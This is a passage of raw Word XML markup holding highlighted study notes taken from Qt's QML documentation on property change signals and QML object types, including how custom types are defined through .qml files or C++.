        <w:t>Keys</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onDigit3Pressed</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font </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 xml:space="preserve"> otherText</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>font</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In contrast, properties of an</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId142" w:anchor="qml-object-types" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>object type</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emit their own property change signals</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and a property change signal handler for an object-type property is only invoked when the property is reassigned to a different object value.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="183"/>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00B307B1" w:rsidRDefault="00AD197D" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00B307B1" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId143" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-typesystem-objecttypes.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00FD0330">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_Toc483000576"/>
      <w:bookmarkStart w:id="207" w:name="_Toc483003597"/>
      <w:bookmarkStart w:id="208" w:name="_Toc483603928"/>
      <w:bookmarkStart w:id="209" w:name="_Toc483605148"/>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Object Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
      <w:bookmarkEnd w:id="207"/>
      <w:bookmarkEnd w:id="208"/>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML object type is</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type from which a QML object can be instantiated</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In syntactic </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>terms, a QML object type is one which can be used to declare an object by specifying the</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type name</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>followed by a set of curly braces that encompasses the attributes of that object</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This differs from</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>basic types</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which cannot be used in the same way. For example,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId144" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a QML object type: it can be used to create</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type objects. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cannot be done with primitive types</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bool</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which are used to hold simple data types rather than objects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom QML object types</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be defined by creating a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.qml file</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that defines the type, as discussed in</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId145" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Documents as QML object type definitions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or by </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>defining a QML type from C++ and registering the type with the QML engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as discussed in</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId146" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining QML Types from C++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00FD0330">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="210" w:name="defining-object-types-from-qml"/>
      <w:bookmarkStart w:id="211" w:name="_Toc483000577"/>
      <w:bookmarkStart w:id="212" w:name="_Toc483003598"/>
      <w:bookmarkStart w:id="213" w:name="_Toc483603929"/>
      <w:bookmarkStart w:id="214" w:name="_Toc483605149"/>
      <w:bookmarkEnd w:id="210"/>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining Object Types from QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
      <w:bookmarkEnd w:id="212"/>
      <w:bookmarkEnd w:id="213"/>
      <w:bookmarkEnd w:id="214"/>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00297A80">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="defining-object-types-through-qml-docume"/>
      <w:bookmarkStart w:id="216" w:name="_Toc483000578"/>
      <w:bookmarkStart w:id="217" w:name="_Toc483003599"/>
      <w:bookmarkStart w:id="218" w:name="_Toc483603930"/>
      <w:bookmarkStart w:id="219" w:name="_Toc483605150"/>
      <w:bookmarkEnd w:id="215"/>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining Object Types through QML Documents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
      <w:bookmarkEnd w:id="217"/>
      <w:bookmarkEnd w:id="218"/>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Plugin writers and application developers may provide types defined </w:t>
      </w:r>
      <w:r w:rsidRPr="002749C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as QML documents</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. A QML document, when visible to the </w:t>
      </w:r>
      <w:r w:rsidRPr="002749C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML import system</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, defines a type identified by the </w:t>
      </w:r>
      <w:r w:rsidRPr="002749C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name of the file minus the file extensions</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
